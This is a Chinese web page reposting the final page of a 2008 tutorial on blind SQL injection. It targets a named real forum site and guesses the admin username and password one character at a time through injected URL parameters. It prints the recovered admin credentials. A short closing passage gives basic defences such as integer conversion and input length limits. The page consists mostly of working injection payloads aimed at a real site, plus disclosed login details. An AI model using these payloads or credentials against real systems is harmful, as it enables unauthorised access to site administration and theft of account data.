WEB开发网
开发学院网络安全黑客技术 给大家发一个SQL注入实战教程吧 阅读

给大家发一个SQL注入实战教程吧

 2008-10-27 16:51:38 来源:WEB开发网   
核心提示: len(password)=10)呵呵~~密码长度为10. 用户名长度为:10 密码长度为:10 现在来猜用户名.http://www.shbbs.net/Article/list.asp?id=974 and 1=(select min(id) from admin where mid(

len(password)=10)

呵呵~~密码长度为10.

用户名长度为:10 密码长度为:10

现在来猜用户名.

http://www.shbbs.net/Article/list.asp?id=974 and 1=(select min(id) from admin where

mid(username,1,1)='a')

错了~~

我再猜~~

http://www.shbbs.net/Article/list.asp?id=974 and 1=(select min(id) from admin where

mid(username,1,1)='s')

呵呵~~正确~~

用户名第一位是 s

猜用户名的第二位~~

http://www.shbbs.net/Article/list.asp?id=974 and 1=(select min(id) from admin where

mid(username,2,1)='h')

用户名第二位是 h

由于时间关系,我早就猜好了,用户名:shbbsadmin

我们现在来猜密码~~ 猜密码跟猜用户名一样~~

http://www.shbbs.net/Article/list.asp?id=974 and 1=(select min(id) from admin where

mid(password,1,1)='s')

猜啊猜~

由于时间关系,密码我都猜好了,呵呵~~密码:shbbsadmin 哈哈~~跟用户名一样~~~~

用户:shbbsadmin

密码:shbbsadmin       

============================================================

呵呵,我以前用动网文章系统,被sql注入攻击者都写成教程给别人下载了

有些SB就拿我开刀,所幸我的论坛和文章发布系统用户名密码各不相同,否则损失可惨了

于是培养了稍于注意安全的写代码习惯。

如ID等数值型参数都是加cint()进行类型转换的,注入绝对是不成功的,如果是字符型参数都不用害怕',会当

做一个字符部分,毫无作用。

另外就是对传入参数做长度限定,比如

if len(request("id"))>5 then response.end

简单的一句话让注入攻击者一筹莫展

上一页  1 2 3 

Tags:大家 一个 SQL

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接